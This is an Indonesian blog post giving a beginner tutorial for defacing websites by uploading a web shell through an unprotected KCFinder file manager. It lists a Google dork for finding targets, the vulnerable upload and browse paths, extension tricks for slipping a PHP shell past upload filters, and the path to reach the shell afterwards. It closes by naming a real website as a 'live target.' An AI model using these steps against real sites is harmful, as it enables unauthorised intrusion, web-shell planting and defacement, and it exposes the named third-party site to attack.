Tutorial Deface Kcfinder Upload Shell (Basic)
Januari 29, 2019
Anwar saputra
Oke gua hari ini mau share Tutorial Deface Kcfinder Upload Shell
Mungkin buat Kalian ada yang Belom Tau Tutorial ini Caranya Cukup Simple Bagi pemula ;).
Oke langsung saja
Bahan :
> Dork
> Shell
> Internet
> Kopi
DORK: inurl:/kcfinder/upload/ sisanya? Use Your Brain :)
Exploit: www.target.com/[path]/kcfinder/upload.php or browse.php
1. Langkah Pertama Cari dulu menggunakan Dork diatas Melalui Google Image, Nah Karna disini gua udah dapet Site nya jadi langsung aja Ok
Ciri Ciri Target Vuln? pas buka upload.php ada notice "Unknown Error"
2. Kalo udah muncul Gitu Langsung aja Buka www.target.com/kcfinder/browse.php
3. kalo udah Keliatan Seperti itu Tinggal kalian Upload shell kalian :) Sebelum Upload shell kalian ubah extensi shell kalian terlebih dahulu agar bisa ke upload.
Type extensi Shell: .php.fla, .php2, .php5, .php56, .php.pjpg
4. Kalo udah ke upload tinggal Kalian Akses file kalian tadi
Caranya: www.target.com/[PATH]/kcfinder/upload/files/shell.php
LIVE TARGET: https://www.judoverenigingdeusone.nl/kcfinder/browse.php
Sekian Terimakasih :'D
0 Komentar